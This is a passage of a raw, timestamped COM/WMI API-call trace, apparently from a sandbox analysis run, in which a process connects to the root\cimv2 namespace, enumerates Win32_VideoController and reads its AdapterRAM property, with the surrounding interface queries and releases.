pAuthnLevel=0x38ef3c*=0x6, pImpLevel=0x38ef2c*=0x2, pAuthInfo=0x38ef30, pCapabilites=0x38ef34*=0x1) returned 0x0 [0231.601] IUnknown:Release (This=0x544f09c) returned 0x1 [0231.601] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eee8 | out: ppvObject=0x38eee8*=0x55c527c) returned 0x0 [0231.601] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eed4 | out: ppvObject=0x38eed4*=0x544f09c) returned 0x0 [0231.601] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.602] IUnknown:Release (This=0x544f09c) returned 0x2 [0231.602] WbemLocator:IUnknown:Release (This=0x55c527c) returned 0x1 [0231.602] CoTaskMemFree (pv=0x55febb8) [0231.602] IUnknown:AddRef (This=0x544f098) returned 0x2 [0231.603] CoGetContextToken (in: pToken=0x38e404 | out: pToken=0x38e404) returned 0x0 [0231.603] CoGetContextToken (in: pToken=0x38e814 | out: pToken=0x38e814) returned 0x0 [0231.603] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7b0 | out: ppvObject=0x38e7b0*=0x55c5264) returned 0x0 [0231.603] WbemLocator:IRpcOptions:Query (in: This=0x55c5264, pPrx=0x563a6e0, dwProperty=2, pdwValue=0x38e8a4 | out: pdwValue=0x38e8a4) returned 0x80004002 [0231.603] WbemLocator:IUnknown:Release (This=0x55c5264) returned 0x2 [0231.603] CoGetContextToken (in: pToken=0x38ede4 | out: pToken=0x38ede4) returned 0x0 [0231.603] CoGetContextToken (in: pToken=0x38ed44 | out: pToken=0x38ed44) returned 0x0 [0231.603] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee14*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ece0 | out: ppvObject=0x38ece0*=0x544f098) returned 0x0 [0231.603] IUnknown:Release (This=0x544f098) returned 0x2 [0231.603] SysStringLen (param_1=0x0) returned 0x0 [0231.603] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0231.604] CoTaskMemAlloc (cb=0x4) returned 0x55ed428 [0231.604] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x55ed428, puReturned=0x26b2788 | out: apObjects=0x55ed428*=0x55c6560, puReturned=0x26b2788*=0x1) returned 0x0 [0231.762] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e68c | out: ppvObject=0x38e68c*=0x55c6560) returned 0x0 [0231.762] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e640 | out: ppvObject=0x38e640*=0x0) returned 0x80004002 [0231.762] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e468 | out: ppvObject=0x38e468*=0x0) returned 0x80004002 [0231.762] IUnknown:AddRef (This=0x55c6560) returned 0x3 [0231.762] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df9c | out: ppvObject=0x38df9c*=0x0) returned 0x80004002 [0231.762] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38df4c | out: ppvObject=0x38df4c*=0x0) returned 0x80004002 [0231.762] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38df58 | out: ppvObject=0x38df58*=0x55c6564) returned 0x0 [0231.762] IMarshal:GetUnmarshalClass (in: This=0x55c6564, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df60 | out: pCid=0x38df60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0231.762] IUnknown:Release (This=0x55c6564) returned 0x3 [0231.763] CoGetContextToken (in: pToken=0x38dfb8 | out: pToken=0x38dfb8) returned 0x0 [0231.763] CoGetContextToken (in: pToken=0x38e3cc | out: pToken=0x38e3cc) returned 0x0 [0231.763] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e44c | out: ppvObject=0x38e44c*=0x0) returned 0x80004002 [0231.763] IUnknown:Release (This=0x55c6560) returned 0x2 [0231.763] CoGetContextToken (in: pToken=0x38e9bc | out: pToken=0x38e9bc) returned 0x0 [0231.763] CoGetContextToken (in: pToken=0x38e91c | out: pToken=0x38e91c) returned 0x0 [0231.763] IUnknown:QueryInterface (in: This=0x55c6560, riid=0x38e9ec*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e9e8 | out: ppvObject=0x38e9e8*=0x55c6560) returned 0x0 [0231.763] IUnknown:AddRef (This=0x55c6560) returned 0x4 [0231.763] IUnknown:Release (This=0x55c6560) returned 0x3 [0231.763] IUnknown:Release (This=0x55c6560) returned 0x2 [0231.763] CoTaskMemFree (pv=0x55ed428) [0231.763] CoGetContextToken (in: pToken=0x38ed2c | out: pToken=0x38ed2c) returned 0x0 [0231.763] IUnknown:AddRef (This=0x55c6560) returned 0x3 [0231.763] IWbemClassObject:Get (in: This=0x55c6560, wszName="__GENUS", lFlags=0, pVal=0x38f028*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f0a8*=0, plFlavor=0x38f0a4*=0 | out: pVal=0x38f028*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f0a8*=3, plFlavor=0x38f0a4*=64) returned 0x0 [0231.764] IWbemClassObject:Get (in: This=0x55c6560, wszName="__PATH", lFlags=0, pVal=0x38f00c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f090*=0, plFlavor=0x38f08c*=0 | out: pVal=0x38f00c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x38f090*=8, plFlavor=0x38f08c*=64) returned 0x0 [0231.764] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x92 [0231.764] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x92 [0231.764] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f038 | out: ppv=0x38f038*=0x6d0cac) returned 0x0 [0231.764] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f030 | out: pAptType=0x38f030*=1) returned 0x0 [0231.764] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f034 | out: ppvObject=0x38f034*=0x0) returned 0x80004002 [0231.764] IUnknown:Release (This=0x6d0cac) returned 0x1 [0231.765] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9a0 | out: ppv=0x38e9a0*=0x55ed428) returned 0x0 [0231.765] WbemDefPath:IUnknown:QueryInterface (in: This=0x55ed428, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ebb8 | out: ppvObject=0x38ebb8*=0x0) returned 0x80004002 [0231.765] WbemDefPath:IClassFactory:CreateInstance (in: This=0x55ed428, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ebc4 | out: ppvObject=0x38ebc4*=0x5644298) returned 0x0 [0231.765] WbemDefPath:IUnknown:Release (This=0x55ed428) returned 0x0 [0231.765] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x5644298) returned 0x0 [0231.765] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e798 | out: ppvObject=0x38e798*=0x0) returned 0x80004002 [0231.766] WbemDefPath:IUnknown:AddRef (This=0x5644298) returned 0x3 [0231.766] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0231.766] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0a4 | out: ppvObject=0x38e0a4*=0x0) returned 0x80004002 [0231.766] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e0b0 | out: ppvObject=0x38e0b0*=0x5642850) returned 0x0 [0231.766] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642850, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e0b8 | out: pCid=0x38e0b8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0231.766] WbemDefPath:IUnknown:Release (This=0x5642850) returned 0x3 [0231.766] CoGetContextToken (in: pToken=0x38e110 | out: pToken=0x38e110) returned 0x0 [0231.766] CoGetContextToken (in: pToken=0x38e524 | out: pToken=0x38e524) returned 0x0 [0231.766] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5a4 | out: ppvObject=0x38e5a4*=0x0) returned 0x80004002 [0231.766] WbemDefPath:IUnknown:Release (This=0x5644298) returned 0x2 [0231.766] WbemDefPath:IUnknown:Release (This=0x5644298) returned 0x1 [0231.766] CoGetContextToken (in: pToken=0x38eebc | out: pToken=0x38eebc) returned 0x0 [0231.766] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0231.766] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644298, riid=0x38eeec*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38eee8 | out: ppvObject=0x38eee8*=0x5644298) returned 0x0 [0231.766] WbemDefPath:IUnknown:AddRef (This=0x5644298) returned 0x3 [0231.766] WbemDefPath:IUnknown:Release (This=0x5644298) returned 0x2 [0231.766] WbemDefPath:IWbemPath:SetText (This=0x5644298, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0 [0231.766] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644228, puCount=0x38f064 | out: puCount=0x38f064*=0x2) returned 0x0 [0231.766] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f060*=0x0, pszText=0x0 | out: puBuffLength=0x38f060*=0xf, pszText=0x0) returned 0x0 [0231.766] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f060*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f060*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0231.766] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644228, puCount=0x38f030 | out: puCount=0x38f030*=0x2) returned 0x0 [0231.766] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f02c*=0x0, pszText=0x0 | out: puBuffLength=0x38f02c*=0xf, pszText=0x0) returned 0x0 [0231.766] WbemDefPath:IWbemPath:GetText (in: This=0x5644228, lFlags=4, puBuffLength=0x38f02c*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f02c*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0231.766] IWbemClassObject:Get (in: This=0x55c6560, wszName="AdapterRAM", lFlags=0, pVal=0x38f02c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b2fc0*=0, plFlavor=0x26b2fc4*=0 | out: pVal=0x38f02c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b2fc0*=19, plFlavor=0x26b2fc4*=0) returned 0x0 [0231.767] IWbemClassObject:Get (in: This=0x55c6560, wszName="AdapterRAM", lFlags=0, pVal=0x38f034*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b2fc0*=19, plFlavor=0x26b2fc4*=0 | out: pVal=0x38f034*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26b2fc0*=19, plFlavor=0x26b2fc4*=0) returned 0x0 [0231.767] CoTaskMemAlloc (cb=0x4) returned 0x5642880 [0231.767] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642880, puReturned=0x26b2788 | out: apObjects=0x5642880*=0x0, puReturned=0x26b2788*=0x0) returned 0x1 [0231.768] CoTaskMemFree (pv=0x5642880) [0231.768] CoGetContextToken (in: pToken=0x38ef5c | out: pToken=0x38ef5c) returned 0x0 [0231.768] IUnknown:Release (This=0x544f098) returned 0x1 [0231.768] IUnknown:Release (This=0x544f098) returned 0x0 [0231.769] CoGetContextToken (in: pToken=0x38ef5c | out: pToken=0x38ef5c) returned 0x0 [0231.769] IUnknown:Release (This=0x544efd0) returned 0x1 [0231.769] IUnknown:Release (This=0x544efd0) returned 0x0 [0231.791] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f05c | out: puCount=0x38f05c*=0x2) returned 0x0 [0231.791] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f058*=0x0, pszText=0x0 | out: puBuffLength=0x38f058*=0xf, pszText=0x0) returned 0x0 [0231.791] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f058*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f058*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0231.792] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efe4 | out: ppv=0x38efe4*=0x6d0cac) returned 0x0 [0231.792] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efdc | out: pAptType=0x38efdc*=1) returned 0x0 [0231.792] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efe0 | out: ppvObject=0x38efe0*=0x0) returned 0x80004002 [0231.792] IUnknown:Release (This=0x6d0cac) returned 0x1 [0231.792] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec00 | out: ppv=0x38ec00*=0x563a6f8) returned 0x0 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x563a6f8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee18 | out: ppvObject=0x38ee18*=0x0) returned 0x80004002 [0231.793] WbemLocator:IClassFactory:CreateInstance (in: This=0x563a6f8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee24 | out: ppvObject=0x38ee24*=0x5642880) returned 0x0 [0231.793] WbemLocator:IUnknown:Release (This=0x563a6f8) returned 0x0 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea44 | out: ppvObject=0x38ea44*=0x5642880) returned 0x0 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e9f8 | out: ppvObject=0x38e9f8*=0x0) returned 0x80004002 [0231.793] WbemLocator:IUnknown:AddRef (This=0x5642880) returned 0x3 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e354 | out: ppvObject=0x38e354*=0x0) returned 0x80004002 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e304 | out: ppvObject=0x38e304*=0x0) returned 0x80004002 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e310 | out: ppvObject=0x38e310*=0x0) returned 0x80004002 [0231.793] CoGetContextToken (in: pToken=0x38e370 | out: pToken=0x38e370) returned 0x0 [0231.793] CoGetContextToken (in: pToken=0x38e784 | out: pToken=0x38e784) returned 0x0 [0231.793] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e804 | out: ppvObject=0x38e804*=0x0) returned 0x80004002 [0231.793] WbemLocator:IUnknown:Release (This=0x5642880) returned 0x2 [0231.793] WbemLocator:IUnknown:Release (This=0x5642880) returned 0x1 [0231.794] CoGetContextToken (in: pToken=0x38ee04 | out: pToken=0x38ee04) returned 0x0 [0231.794] CoGetContextToken (in: pToken=0x38ed64 | out: pToken=0x38ed64) returned 0x0 [0231.794] WbemLocator:IUnknown:QueryInterface (in: This=0x5642880, riid=0x38ee34*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee30 | out: ppvObject=0x38ee30*=0x5642880) returned 0x0 [0231.794] WbemLocator:IUnknown:AddRef (This=0x5642880) returned 0x3 [0231.794] WbemLocator:IUnknown:Release (This=0x5642880) returned 0x2 [0231.794] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efc0 | out: puCount=0x38efc0*=0x2) returned 0x0 [0231.794] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38efbc*=0x0, pszText=0x0 | out: puBuffLength=0x38efbc*=0xf, pszText=0x0) returned 0x0 [0231.794] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38efbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0231.794] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38ee6c | out: ppv=0x38ee6c*=0x5642820) returned 0x0 [0231.794] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642820, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef0c | out: ppNamespace=0x38ef0c*=0x563f688) returned 0x0 [0231.987] WbemLocator:IUnknown:QueryInterface (in: This=0x563f688, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed90 | out: ppvObject=0x38ed90*=0x55c516c) returned 0x0 [0231.988] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c516c, pProxy=0x563f688, pAuthnSvc=0x38ede0, pAuthzSvc=0x38eddc, pServerPrincName=0x38edd4, pAuthnLevel=0x38edd8, pImpLevel=0x38edc8, pAuthInfo=0x38edcc, pCapabilites=0x38edd0 | out: pAuthnSvc=0x38ede0*=0xa, pAuthzSvc=0x38eddc*=0x0, pServerPrincName=0x38edd4, pAuthnLevel=0x38edd8*=0x6, pImpLevel=0x38edc8*=0x2, pAuthInfo=0x38edcc, pCapabilites=0x38edd0*=0x1) returned 0x0 [0231.988] WbemLocator:IUnknown:Release (This=0x55c516c) returned 0x1 [0231.988] WbemLocator:IUnknown:QueryInterface (in: This=0x563f688, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed84 | out: ppvObject=0x38ed84*=0x55c518c) returned 0x0 [0231.988] WbemLocator:IUnknown:QueryInterface (in: This=0x563f688, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed70 | out: ppvObject=0x38ed70*=0x55c516c) returned 0x0 [0231.988] WbemLocator:IClientSecurity:SetBlanket (This=0x55c516c, pProxy=0x563f688, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0231.988] WbemLocator:IUnknown:Release (This=0x55c516c) returned 0x2 [0231.988] WbemLocator:IUnknown:Release (This=0x55c518c) returned 0x1 [0231.988] CoTaskMemFree (pv=0x55febb8) [0231.988] WbemLocator:IUnknown:AddRef (This=0x563f688) returned 0x2 [0231.988] WbemLocator:IUnknown:Release (This=0x5642820) returned 0x0 [0231.989] CoGetContextToken (in: pToken=0x38e2c4 | out: pToken=0x38e2c4) returned 0x0 [0231.989] CoGetContextToken (in: pToken=0x38e6d4 | out: pToken=0x38e6d4) returned 0x0 [0231.989] WbemLocator:IUnknown:QueryInterface (in: This=0x563f688, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, 